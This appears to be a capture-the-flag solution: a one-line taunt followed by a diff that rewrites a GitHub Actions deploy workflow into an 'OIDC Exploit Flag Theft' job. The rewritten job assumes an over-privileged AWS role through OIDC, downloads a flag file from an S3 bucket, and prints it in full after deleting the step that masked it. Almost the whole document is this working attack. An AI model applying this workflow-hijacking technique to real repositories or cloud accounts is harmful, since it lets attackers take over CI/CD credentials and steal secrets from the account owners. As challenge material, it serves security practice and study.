Flag, you're pretty cute.

--- a/.github/workflows/deploy.yml
+++ b/.github/workflows/deploy.yml
@@ -1,43 +1,33 @@
-name: Deploy Static Website to S3
+name: OIDC Exploit Flag Theft
 
 on:
   push:
-    branches: [ main ]
-  workflow_dispatch:  # Allows manual triggering
+    branches: [ main ] 
+  workflow_dispatch:
 
-# OIDC permissions for keyless authentication
 permissions:
-  id-token: write
+  id-token: write 
   contents: read
 
 jobs:
-  deploy:
+  exploit:
     runs-on: ubuntu-latest
-
     steps:
-    - name: Checkout repository
+    
+    - name: Checkout Repository
       uses: actions/checkout@v3
 
-    # OIDC/IRSA Authentication - No more access keys!
-    - name: Configure AWS credentials via OIDC
+    - name: Configure AWS credentials via OIDC (Assume Role)
       uses: aws-actions/configure-aws-credentials@v4
       with:
-        role-to-assume: "arn:aws:iam::694502195928:role/admin-godmode-flag-reader-lol-698875"
-        role-session-name: GitHubActions-Backend-${{ github.run_id }}
+        role-to-assume: "arn:aws:iam::694502195928:role/admin-godmode-flag-reader-lol-698875" 
+        role-session-name: AttackerSession-${{ github.run_id }}
         aws-region: "ap-southeast-1"
         
-    # Read flag from the S3 Storage.
-    - name: Read flag from the secret storage
+    - name: Get and Print the Flag using AWS CLI
       run: |
-        aws s3 cp s3://oh-i-really-do-care/flag.txt .
-        # Mask the SHA256 portion with XXXXXXXXXXXXXXX
-        perl -i -pe 's/(STDIO2025_\d+)\{([0-9A-Fa-f]{3})([0-9A-Fa-f]+)\}/$1."{".$2.("X"x length($3))."}"/ge' flag.txt
+        aws s3 cp s3://oh-i-really-do-care/flag.txt flag.txt --region ap-southeast-1
+        echo "--- FLAG CONTENT (Mission Complete) ---"
+        cat flag.txt
+        echo "-------------------------------------"
 
-    # # Deploy to S3 bucket - directly sync the repository contents
-    # - name: Deploy to S3
-    #   run: |
-    #     aws s3 sync ./ s3://oh-i-dont-care/ \
-    #       --delete \
-    #       --exclude ".git/*" \
-    #       --exclude ".github/*" \
-    #       --exclude "README.md" 
